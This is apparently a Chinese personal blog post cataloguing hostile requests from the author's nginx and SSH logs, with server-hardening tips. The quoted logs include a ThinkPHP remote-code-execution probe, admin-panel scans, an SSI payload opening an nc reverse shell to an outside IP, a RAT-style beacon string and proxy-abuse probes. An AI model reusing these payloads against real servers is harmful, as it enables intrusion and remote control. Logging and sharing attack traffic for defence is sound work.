目录
当你翻服务器日志时
yuchenxi0_0
编辑于 2020年03月04日 10:23

以下数据全部出自个人网站nginx日志。

针对php的攻击

  • GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars1=HelloThinkPHP HTTP/1.1

  • GET /phpmyadmin1/index.php?lang=en HTTP/1.1

  • GET /administrator/web/index.php?lang=en HTTP/1.1

  • GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1

  • GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1

各大网站对你网站对分析

  • user-agent: HTTP Banner Detection (https://security.ipip.net)

搜索引擎爬虫

  • user-agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html

word press

  • GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1

mysql

  • GET /mysql/admin/index.php?lang=en HTTP/1.1

shell攻击

  • GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2037.49.226.137%2029312%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0

针对Windows的攻击

  • 145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==

尝试使用socks5

  • \x05\x01\x00

尝试使用http proxy

  • GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1

这人试图让服务器代理访问自己的机器。

回怼:http://110.249.212.46/testget?q=tmd-nmsl&port=740

尝试使用https proxy

  • CONNECT ip.ws.126.net:443 HTTP/1.1

ip:222.186.19.221,这台机器发了好几次了😡

(https://ip.ws.126.net是网易ip位置查询接口)

尝试ssh

如果使用默认22端口你会在ssh日志里看到无数条这样的记录:

(查看方法journalctl -u ssh)

Mar 01 14:22:23 ycx-debian sshd[16357]: error: Could not load host key: /etc/ssh/ssh_host_ecdsa_key Mar 01 14:22:23 ycx-debian sshd[16357]: error: Could not load host key: /etc/ssh/ssh_host_ed25519_key Mar 01 14:22:23 ycx-debian sshd[16357]: Received disconnect from 222.186.30.248 port 43119:11:  [preauth] Mar 01 14:22:23 ycx-debian sshd[16357]: Disconnected from 222.186.30.248 port 43119 [preauth]

所以,赶快改ssh端口吧。

个人安全建议

  • 尽量使用https。http明文不安全,而且容易被关键词过滤。

  • 尽量不要用php。记录里80%是针对php的攻击。

  • ssh修改默认22端口,用密钥登陆并禁止密码登陆。

  • nginx有相关过滤垃圾请求的项目,github上可搜。

本文为我原创,未经授权禁止转载
cv4949333